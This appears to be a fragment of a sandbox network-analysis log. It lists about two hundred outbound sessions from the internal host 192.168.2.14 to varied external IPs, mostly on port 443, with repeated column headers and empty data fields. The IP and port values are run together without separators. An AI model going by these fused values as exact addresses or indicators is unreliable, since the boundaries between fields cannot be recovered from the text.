                                                      13236192.168.2.145326220.220.44.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13237192.168.2.144547886.82.134.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13238192.168.2.145365437.3.228.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13239192.168.2.1438156194.43.140.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13240192.168.2.145633297.64.220.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13241192.168.2.145716660.158.51.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13242192.168.2.1452252126.28.54.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13243192.168.2.1445330154.52.151.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13244192.168.2.144352235.68.53.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13245192.168.2.144189454.97.144.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13246192.168.2.1457084171.27.176.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13247192.168.2.1438932171.78.24.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13248192.168.2.144479417.47.114.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13249192.168.2.145694817.93.43.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13250192.168.2.144505224.116.113.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13251192.168.2.1449654204.135.24.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13252192.168.2.145323839.3.43.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13253192.168.2.1448228210.126.196.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13254192.168.2.144075079.184.168.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13255192.168.2.1436574181.102.148.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13256192.168.2.143466213.39.230.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13257192.168.2.143897278.248.9.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13258192.168.2.1447462155.153.35.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13259192.168.2.1455842151.186.5.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13260192.168.2.1460396175.7.248.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13261192.168.2.1441508212.11.175.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13262192.168.2.144892883.180.222.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13263192.168.2.1455178204.34.76.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13264192.168.2.144074476.31.235.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13265192.168.2.143907657.138.209.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13266192.168.2.1436448209.157.32.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13267192.168.2.145931669.57.77.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13268192.168.2.1444198166.148.233.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13269192.168.2.1457146204.242.65.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13270192.168.2.1445800196.31.35.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13271192.168.2.1457074133.61.89.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13272192.168.2.1454844110.161.180.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13273192.168.2.1434394144.203.20.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13274192.168.2.145018892.179.103.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13275192.168.2.1453466171.95.231.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13276192.168.2.145077881.136.188.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13277192.168.2.143458690.69.21.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13278192.168.2.144377664.166.218.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13279192.168.2.145160682.3.128.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13280192.168.2.1460004170.57.142.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13281192.168.2.1445994149.175.176.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13282192.168.2.1440988143.104.174.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13283192.168.2.1459866137.236.22.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13284192.168.2.1448684201.69.238.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13285192.168.2.1443734148.151.250.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13286192.168.2.1457234164.151.200.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13287192.168.2.144639252.177.67.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13288192.168.2.1460512134.153.108.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13289192.168.2.145338649.80.105.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13290192.168.2.1437880198.85.15.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13291192.168.2.144254824.58.104.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13292192.168.2.1448672135.231.111.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13293192.168.2.143902419.29.252.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13294192.168.2.1455412156.3.222.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13295192.168.2.1447896149.138.227.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13296192.168.2.144952896.38.210.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13297192.168.2.144102686.172.130.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13298192.168.2.1450712185.253.43.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13299192.168.2.144520694.69.220.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13300192.168.2.1452248128.52.54.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13301192.168.2.1454486212.46.138.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13302192.168.2.1460050110.31.32.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13303192.168.2.1455940218.163.157.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13304192.168.2.1447006148.48.251.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13305192.168.2.1446482195.10.154.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13306192.168.2.1438628154.250.123.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13307192.168.2.143510227.45.186.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13308192.168.2.143545077.166.101.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13309192.168.2.1432838209.50.20.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13310192.168.2.1453856129.97.12.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13311192.168.2.144294458.199.57.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13312192.168.2.143981025.91.232.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13313192.168.2.1459558179.90.2.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13314192.168.2.1454222195.201.41.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13315192.168.2.1439044109.55.61.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13316192.168.2.145440876.120.105.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13317192.168.2.1455298112.215.41.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13318192.168.2.145966643.41.18.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13319192.168.2.144018074.7.180.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13320192.168.2.1440136125.41.43.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13321192.168.2.1442508209.43.155.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13322192.168.2.1439296171.67.178.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13323192.168.2.144702843.43.110.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13324192.168.2.1455006173.202.51.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13325192.168.2.1449226217.61.138.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13326192.168.2.1445514124.98.10.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13327192.168.2.1455868116.117.206.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13328192.168.2.145671648.107.253.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13329192.168.2.1444362213.85.166.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13330192.168.2.144669899.118.73.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13331192.168.2.1455040151.122.30.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13332192.168.2.143813432.232.128.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13333192.168.2.1452176110.207.68.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13334192.168.2.1446048178.106.102.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13335192.168.2.144882643.37.153.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13336192.168.2.1451632176.133.25.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13337192.168.2.1438730202.156.93.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13338192.168.2.1436218102.204.119.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13339192.168.2.1453228223.62.12.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13340192.168.2.1435942168.89.248.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13341192.168.2.1437756119.25.104.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13342192.168.2.1458070194.190.76.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13343192.168.2.1459606221.255.45.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13344192.168.2.14485968.232.18.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13345192.168.2.1444804187.66.231.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13346192.168.2.1436564140.210.75.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13347192.168.2.1444452194.152.203.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13348192.168.2.1446608151.152.165.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13349192.168.2.144977072.48.64.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13350192.168.2.145779459.78.255.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13351192.168.2.1435220222.9.2.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13352192.168.2.14330042.251.186.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13353192.168.2.1455644189.229.212.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13354192.168.2.14451205.241.234.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13355192.168.2.1436986111.238.121.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13356192.168.2.145144634.145.188.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13357192.168.2.145898498.34.147.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13358192.168.2.1443344204.4.30.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13359192.168.2.144287699.61.134.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13360192.168.2.1446896163.34.138.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13361192.168.2.1446098223.134.138.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13362192.168.2.1460926141.54.219.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13363192.168.2.1453652179.89.247.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13364192.168.2.144034478.28.44.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13365192.168.2.144149281.213.72.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13366192.168.2.1449130139.119.40.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13367192.168.2.144214072.116.36.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13368192.168.2.1458030129.125.160.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13369192.168.2.14510005.208.193.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13370192.168.2.1459064187.214.65.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13371192.168.2.1453418132.142.183.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13372192.168.2.145634285.181.55.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13373192.168.2.145654634.210.113.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13374192.168.2.144128264.173.10.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13375192.168.2.144041424.44.62.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13376192.168.2.1441538185.148.173.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13377192.168.2.1434214198.183.3.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13378192.168.2.145206613.219.152.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13379192.168.2.1459954181.164.159.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13380192.168.2.145683460.216.20.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13381192.168.2.1435966130.47.221.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13382192.168.2.1440628125.80.9.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13383192.168.2.1443900102.161.215.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13384192.168.2.143774281.1.34.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13385192.168.2.144357091.159.9.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13386192.168.2.143313269.110.183.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13387192.168.2.1433562183.177.113.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13388192.168.2.1449228133.106.137.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13389192.168.2.145286269.196.207.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13390192.168.2.144467239.86.94.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13391192.168.2.144630678.124.213.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13392192.168.2.144843467.66.250.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13393192.168.2.1434744118.185.176.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13394192.168.2.143689827.90.249.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13395192.168.2.1444412178.251.251.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13396192.168.2.144437698.117.168.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13397192.168.2.14437225.212.208.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13398192.168.2.14390204.91.7.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13399192.168.2.145601867.242.37.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13400192.168.2.1443212139.29.59.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13401192.168.2.1449640199.107.238.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13402192.168.2.1432946109.98.97.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13403192.168.2.143458287.108.252.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13404192.168.2.145045871.118.133.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13405192.168.2.1451024100.224.131.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13406192.168.2.1448714185.209.40.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13407192.168.2.1453118222.61.93.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13408192.168.2.145926876.93.244.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13409192.168.2.1458740205.43.234.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13410192.168.2.1448514136.103.45.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13411192.168.2.1434726142.234.183.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13412192.168.2.1455660151.242.35.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13413192.168.2.1450328162.201.163.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13414192.168.2.143766662.36.69.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13415192.168.2.1446264130.94.85.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13416192.168.2.144189699.223.180.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13417192.168.2.144360044.196.251.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13418192.168.2.145836036.148.183.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13419192.168.2.143752068.167.201.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13420192.168.2.1441552119.250.213.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13421192.168.2.1435018115.79.219.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13422192.168.2.143451260.121.83.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13423192.168.2.1460874142.77.167.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13424192.168.2.1456280140.107.187.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13425192.168.2.145312445.52.219.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13426192.168.2.144345075.139.154.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13427192.168.2.1450560177.140.147.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13428192.168.2.144080865.12.212.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13429192.168.2.1440038155.136.32.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13430192.168.2.1436378169.211.242.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13431192.168.2.1457656112.113.243.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13432192.168.2.145886887.118.79.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13433192.168.2.1435250152.56.235.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13434192.168.2.14338281.244.131.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13435192.168.2.145782881.218.94.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13436192.168.2.1432844161.40.214.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13437192.168.2.1446224109.253.89.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13438192.168.2.1442440101.146.110.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13439192.168.2.1444058122.184.48.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13440192.168.2.144043464.224.18.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13441192.168.2.144830294.120.233.778080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13442192.168.2.145833492.38.70.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13443192.168.2.144212697.210.55.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13444192.168.2.1458576124.55.203.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13445192.168.2.14446588.14.152.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13446192.168.2.1443450115.70.214.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13447192.168.2.1457266139.65.50.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13448192.168.2.144682247.18.82.193443
